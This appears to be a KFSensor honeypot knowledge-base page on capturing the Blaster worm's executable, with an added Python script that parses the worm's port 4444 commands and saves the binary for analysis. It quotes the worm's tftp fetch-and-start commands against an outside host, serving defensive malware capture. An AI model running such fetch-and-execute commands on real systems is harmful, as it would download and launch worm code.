KeyFocus - KFSensor Knowledge Base - Blaster worm, capture
Blaster worm, capture

This page describes how to configure KFSensor to capture the executable dropped by the Blaster worm.

The Blaster worm exploits a buffer overflow in the Windows RPC service on TCP port 135, and its shellcode binds a command shell to TCP port 4444.
The infecting host then connects to port 4444 and sends the following commands to that shell ([0A] is a newline character):

tftp -i 81.132.114.254 GET msblast.exe[0A]
start msblast.exe[0A]
msblast.exe[0A]

Different variants of the worm download a differently named executable, e.g. teekids.exe or mslaugh.exe. The IP address in the tftp command is that of the infecting host, which serves the file over TFTP.

This makes it possible to safely download a copy of the worm executable for later analysis.
Running the captured file through a virus checker identifies the variant, and a file the checker does not recognise may be a new variant.

Configuration

The following configuration uses a KFSensor external alert to run a Perl script.

  1. Download the file blastercapture.zip
  2. Unzip the file and extract blastercapture.pl to C:\Program Files\KeyFocus\KFSensor\files\scripts
  3. If you do not already have a Listen defined on TCP port 4444 and TCP port 135 then you will need to set these up. This is described in the MS RPC Buffer Overrun and the Blaster worm section of the KFSensor Administration Guide
  4. Select the Settings->External Alerts menu item
  5. Select the Enable check box
  6. Press the Add... button
  7. Fill in the details as follows:

    The Argument field contains:
    "C:\Program Files\KeyFocus\KFSensor\files\scripts\blastercapture.pl" $eventid
  8. Press return twice

Results

Warning
When the Perl script runs the tftp command a console window appears on the screen while tftp executes.
It closes automatically when tftp completes.

When a Blaster worm connects to TCP port 4444 the data it sends is captured; the Perl script extracts the tftp command from it, downloads the executable from the infecting host and adds the event to its own report file. The download can only succeed while the infecting host is still serving the file over TFTP.

The log file is called blasterlog.txt and is a tab separated file with the fields EventID, Time, SourceIP and FileName.

The executable is saved under the name blast_<filename>_<eventid>.bin, e.g. blast_teekids_161090.bin. The .bin extension avoids an accidental double-click launching the worm.
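The following is an added example of the processing the capture script has to do, written in Python; it is not the blastercapture.pl shipped with KFSensor. It parses the command stream captured on port 4444, validates the attacker-controlled host and file name before they go anywhere near a command line, builds the tftp.exe invocation, names the capture file blast_<filename>_<eventid>.bin and appends the tab-separated blasterlog.txt line. The event id, timestamp, source IP and payload are constructed sample values, and the actual tftp fetch is passed in as a callable so the parsing and logging can be exercised offline.

```python
"""Capture the executable named in a Blaster-style port 4444 command stream.

Added example, not KFSensor's own blastercapture.pl. Sample values below
are constructed; the real fetch runs tftp.exe and is injectable for testing.
"""
import ipaddress
import re
import subprocess
from pathlib import Path

# One captured line looks like: tftp -i 81.132.114.254 GET msblast.exe
TFTP_LINE = re.compile(r"^tftp\s+-i\s+(\S+)\s+GET\s+(\S+)\s*$", re.IGNORECASE)
# The file name comes from the worm: accept a plain name with an .exe
# extension only, never a path, so it cannot escape the capture directory.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.exe$", re.IGNORECASE)

# Constructed sample of what a Blaster.B infection sends to TCP 4444.
SAMPLE_PAYLOAD = "tftp -i 81.132.114.254 GET teekids.exe\nstart teekids.exe\nteekids.exe\n"


def parse_tftp_command(payload: str):
    """Return (host, filename) from the first valid tftp line, else None.

    Both values are attacker-controlled; the host must be an IPv4 literal
    and the name must match SAFE_NAME before they are used.
    """
    for line in payload.splitlines():
        m = TFTP_LINE.match(line.strip())
        if not m:
            continue
        host, name = m.groups()
        try:
            ipaddress.IPv4Address(host)
        except ValueError:
            continue
        if SAFE_NAME.match(name):
            return host, name
    return None


def capture_filename(name: str, eventid: int) -> str:
    """blast_<name without extension>_<eventid>.bin, the naming the page uses."""
    base = name.rsplit(".", 1)[0]
    return f"blast_{base}_{eventid}.bin"


def tftp_argv(host: str, name: str, dest: Path):
    """Windows tftp.exe syntax: tftp -i host GET source destination (-i = binary)."""
    return ["tftp", "-i", host, "GET", name, str(dest)]


def run_tftp(argv):
    """Real fetch. This spawns the console window the page warns about."""
    subprocess.run(argv, check=True, timeout=60)


def log_line(eventid, when, src_ip, filename) -> str:
    """One blasterlog.txt record: EventID, Time, SourceIP, FileName."""
    return "\t".join([str(eventid), when, src_ip, filename]) + "\n"


def capture_event(eventid, when, src_ip, payload, outdir, fetch=run_tftp):
    """Parse the payload, fetch the binary into outdir, append to blasterlog.txt.

    Returns the capture file name, or None if no usable tftp line was found.
    """
    parsed = parse_tftp_command(payload)
    if parsed is None:
        return None
    host, name = parsed
    outdir = Path(outdir)
    outdir.mkdir(parents=True, exist_ok=True)
    dest = outdir / capture_filename(name, eventid)
    fetch(tftp_argv(host, name, dest))
    with open(outdir / "blasterlog.txt", "a", encoding="ascii") as fh:
        fh.write(log_line(eventid, when, src_ip, dest.name))
    return dest.name


if __name__ == "__main__":
    # Dry run: print the tftp command instead of executing it.
    saved = capture_event(161090, "2003-08-12 10:00:00", "81.132.114.254",
                          SAMPLE_PAYLOAD, "captures", fetch=lambda argv: print(" ".join(argv)))
    print("would save as", saved)
```

Run it as the external alert with the KFSensor event id as the argument and the real run_tftp fetch; the only parts that depend on the honeypot are where the payload and source IP for that event id are read from, which the script above takes as parameters.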